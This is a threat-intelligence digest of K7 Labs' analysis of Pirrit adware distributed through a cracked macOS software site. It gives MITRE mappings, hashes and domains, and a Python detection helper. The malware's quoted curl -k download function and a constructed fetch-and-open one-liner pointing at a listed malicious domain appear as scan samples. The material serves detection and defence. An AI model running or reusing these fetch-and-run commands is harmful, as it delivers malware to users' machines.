K7 Labs uncovered a macOS adware campaign centered on a cracked software website that disguised Pirrit as legitimate software. The infection chain uses a two-step download flow, unsigned binaries, and anti-analysis techniques to evade detection, ultimately delivering adware via a launcher and fake installers. #PirritAdware #macOS #crackmac
Keypoints
- Pirrit adware is distributed via a cracked macOS software site, tricking users into downloading unwanted software.
- The site offers two download options and directs users to install OperaGX to obtain the intended program.
- The payload is an unsigned Mach-O binary downloaded from a remote URL and executed via a scripted chain.
- Anti-analysis techniques, including a ptrace(PT_DENY_ATTACH) call that refuses debugger attachment, and anti-VM checks are used to hinder dynamic analysis.
- Users should avoid pirated software and use reputable security products to mitigate this threat.
MITRE Techniques
- [T1189] Drive-by Compromise – The attackers used a cracked software site to lure Mac users into downloading Pirrit adware. ‘a website that was ostensibly providing cracked software for macOS’
- [T1059.004] Command and Scripting Interpreter – The malware uses a shell script to perform actions such as downloading and executing payloads. ‘When it is executed, it executes the following shell command and downloads an application.’
- [T1105] Ingress Tool Transfer – It downloads a payload from a remote URL to a uuidgen-named temporary path and unarchives it; note the curl -k flag, which disables TLS certificate validation. ‘download(){ local -r url="${1}";local -r tmp_dir="${2}";local -r path="${tmp_dir}/$(uuidgen)";if output="$(curl -kLSs -m "30" -o "${path}" "${url}" 2>&1)";then echo "${path}";else return 1;fi }’
- [T1497] Virtualization/Sandbox Evasion – Anti-analysis and VM checks, including a call to ptrace with the PT_DENY_ATTACH flag so that a debugger cannot attach to the process. ‘anti-analysis. It is done through calling ptrace with the flag PT_DENY_ATTACH.’
- [T1204] User Execution – The site requires the user to download and install the OperaGX browser before it serves the requested application. ‘It asks the user to download and install the OperaGX browser to download the application (i.e. Adobe Acrobat Pro in this case).’
Indicators of Compromise
- [Hash] Sample hashes (32-hex, MD5) – 0C42838DA01CCC34E08FE7300D8913B9, F74F2F61E9924A139E04248A6C6A190E
- [Domain] Distribution domains – crack-mac.com, Vexfile.com
- [File name] Delivered archives (note the stacked extensions) – Adobe_Acrobat_2023_Setup.zip.dmg, Installer.app.zip
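The following triage helper is an added example for this digest, not code from K7 Labs or from the malware. It turns the two technical points above into something a responder can run: the scripted fetch-and-run chain (curl with -k to a uuidgen-named path, then execution) is matched as a set of command-line heuristics, and the listed hashes, domains and file names are matched against downloaded files. The IoC values are the ones on the page; the shell samples it scans are constructed inputs, and the one-liner's URL path is a placeholder rather than the real download location.

```python
"""Triage helpers for the Pirrit delivery chain summarised above.

Added example for this digest; not code from K7 Labs or from the malware.
IoC values come from the page; the shell samples scanned below are
constructed inputs (the one-liner's URL path is a placeholder).
"""
import hashlib
import re
from pathlib import PurePosixPath
from typing import List, Optional

# Indicators from the page, normalised to lower case where case is irrelevant.
IOC_MD5 = {"0c42838da01ccc34e08fe7300d8913b9", "f74f2f61e9924a139e04248a6c6a190e"}
IOC_DOMAINS = {"crack-mac.com", "vexfile.com"}
IOC_FILENAMES = {"Adobe_Acrobat_2023_Setup.zip.dmg", "Installer.app.zip"}

# Stacked archive/installer extensions (".zip.dmg", ".app.zip") obscure what
# the user really opens; both listed file names have this shape.
DOUBLE_EXT = re.compile(r"\.(zip|dmg|pkg|app)\.(zip|dmg|pkg)$", re.IGNORECASE)

# curl with -k/--insecure (TLS certificate checks disabled) inside one pipeline
# segment; "-kLSs" bundles the flag with others, so allow letters around the k.
CURL_INSECURE = re.compile(r"\bcurl\b[^;&|]*?\s(?:-[A-Za-z]*k[A-Za-z]*|--insecure)(?=\s|$)")
# Output path built from a random UUID, as in the page's download() helper.
UUIDGEN_PATH = re.compile(r"\$\(\s*uuidgen\s*\)|`uuidgen`")
# Hostname of any URL on the line, checked against IOC_DOMAINS.
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
# curl followed on the same line by a step that opens or executes the result.
FETCH_THEN_RUN = re.compile(r"\bcurl\b.*?(?:;|&&|\|\|)\s*(?:chmod|open|xattr|hdiutil|bash|sh|sudo)\b")


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def match_domain(host: str) -> bool:
    """True if host equals, or is a subdomain of, a listed domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in IOC_DOMAINS)


def match_file_iocs(name: str, data: Optional[bytes] = None,
                    md5: Optional[str] = None) -> List[str]:
    """IoC hits for a downloaded file: listed name, stacked extension, listed hash.

    Pass the file bytes, or a digest already computed by another tool.
    """
    hits = []
    base = PurePosixPath(name).name
    if base in IOC_FILENAMES:
        hits.append(f"filename:{base}")
    if DOUBLE_EXT.search(base):
        hits.append("double-extension")
    digest = (md5_hex(data) if data is not None else (md5 or "")).lower()
    if digest in IOC_MD5:
        hits.append(f"md5:{digest}")
    return hits


def scan_shell_command(cmd: str) -> List[str]:
    """Flag the fetch-and-run shape of the download chain in one command line.

    Hits, in order: curl-insecure, uuidgen-path, ioc-domain:<host>, fetch-and-run.
    Intended for process-execution logs; any single hit is weak on its own,
    the combination is what matches the chain described above.
    """
    hits = []
    if CURL_INSECURE.search(cmd):
        hits.append("curl-insecure")
    if UUIDGEN_PATH.search(cmd):
        hits.append("uuidgen-path")
    for host in URL_HOST.findall(cmd):
        if match_domain(host):
            hits.append(f"ioc-domain:{host.lower().rstrip('.')}")
    if FETCH_THEN_RUN.search(cmd):
        hits.append("fetch-and-run")
    return hits


# Constructed inputs: the download() helper quoted on the page, and a
# one-liner of the same shape pointing at a listed domain (placeholder path).
SAMPLE_DOWNLOAD_FN = (
    'download(){ local -r url="${1}";local -r tmp_dir="${2}";'
    'local -r path="${tmp_dir}/$(uuidgen)";'
    'if output="$(curl -kLSs -m "30" -o "${path}" "${url}" 2>&1)";'
    'then echo "${path}";else return 1;fi }'
)
SAMPLE_ONE_LINER = (
    'p=/tmp/$(uuidgen); curl -kLSs -m 30 -o "$p" '
    '"https://vexfile.com/EXAMPLE_PATH" && open "$p"'
)

if __name__ == "__main__":
    for label, cmd in (("download()", SAMPLE_DOWNLOAD_FN), ("one-liner", SAMPLE_ONE_LINER)):
        print(label, scan_shell_command(cmd))
    print(match_file_iocs("/Users/demo/Downloads/Adobe_Acrobat_2023_Setup.zip.dmg",
                          data=b"constructed bytes, not the real sample"))
    print(match_file_iocs("Installer.app.zip", md5="0C42838DA01CCC34E08FE7300D8913B9"))
```

The quoted download() function alone trips only the curl-insecure and uuidgen-path heuristics, because execution happens in a later step of the chain; a fetch-and-run hit needs the execution on the same command line, as in the constructed one-liner. The hash check accepts a digest from another tool so the helper can be run over an EDR export without re-reading the files.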
Read more: https://labs.k7computing.com/index.php/macos-pirrit-adware/